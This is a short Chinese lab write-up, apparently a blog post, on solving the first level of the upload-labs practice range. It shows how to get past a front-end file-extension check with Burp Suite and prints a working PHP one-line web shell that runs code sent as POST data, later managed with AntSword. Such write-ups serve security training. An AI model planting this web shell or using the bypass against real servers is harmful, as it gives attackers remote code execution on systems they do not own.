环境
在github上下载upload-labs资源,使用phpstudy搭建靶场环境
github地址:GitHub - c0ny1/upload-labs
还用到一个抓包工具bp(burpsuite)。
判断检测方式
这个环境每一关都有一个提示。
点击查看提示,显示实在前端进行的过滤
绕过前端检测是最简单的,可以直接禁用网页js,也可以使用另外一种方式,这里介绍我的过关方法。
绕过检测
创建一个txt文件,内容写php一句话木马:
<?php @eval($_POST['cmd']); ?>写好后将文件后缀修改为.png
选择上传写好的木马文件,使用bp抓取数据包,然后更改文件后缀
获取webshell
根据响应包中的相对路径访问上传的php文件
界面没有任何结果,也没有报错,这就是访问成功了。
接下来使用webshell管理工具,我这里使用的是蚁剑(AntSword),复制url,添加密码
这样第一关就闯关成功了,
400
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
